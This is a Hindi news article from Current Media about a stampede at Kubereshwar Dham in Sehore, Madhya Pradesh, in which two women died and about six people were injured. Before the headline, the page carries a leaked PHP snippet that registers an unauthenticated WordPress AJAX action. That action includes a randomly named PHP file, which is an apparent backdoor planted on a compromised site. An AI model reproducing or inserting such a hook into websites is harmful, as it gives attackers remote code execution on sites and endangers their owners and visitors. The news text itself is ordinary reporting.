if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }मध्य प्रदेश के सीहोर के कुबेरेश्वर धाम में मची भगदड से दो श्रद्धालुओं की मौत - Current Media

मध्य प्रदेश के सीहोर के कुबेरेश्वर धाम में मची भगदड से दो श्रद्धालुओं की मौत

भोपाल । मध्य प्रदेश के सीहोर ज़िले में मंगलवार को कुबेरेश्वर धाम में भगदड़ मचने से दो महिलाओं की मौत हो गई है और कई लोग घायल बताए जा रहे हैं। इस घटना की पुष्टि करते हुए सीहोर ज़िले की एडिशनल एसपी सुनीता रावत ने बताया, अब तक की जानकारी में कुबेरेश्वर धाम में हुई भगदड़ में दो महिलाओं की मौत हुई है । और लगभग छह अन्य लोग घायल हैं, जिन्हें अस्पताल पहुंचाया गया है।
कैसे मची भगदड़?
बताया जा रहा है कि कुबेरेश्वर धाम में अनुमान से अधिक भीड़ उमड़ने से अफरा-तफरी मच गई। दरअसल, बुधवार 6 अगस्त को प्रदीप मिश्रा की अगुआई में सीहोर जिले के कुबेरेश्वर धाम में कांवड़ यात्रा निकलनी थी।
स्थानीय प्रशासन के अनुसार, बढ़ती भीड़ के कारण भंडारे, ठहरने की जगह और दर्शन के स्थानों पर जगह कम पड़ने लगी, जिससे कई जगहों पर अफरा-तफरी का माहौल बन गया।
प्रशासन ने कुबेरेश्वर धाम के साथ मिलकर इस यात्रा के लिए मंगलवार की रात से व्यवस्था करने का प्लान बनाया था, लेकिन इससे पहले ही यहां पर भीड़ काफी बढ़ गई थह जिससे भगदड़ मची।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …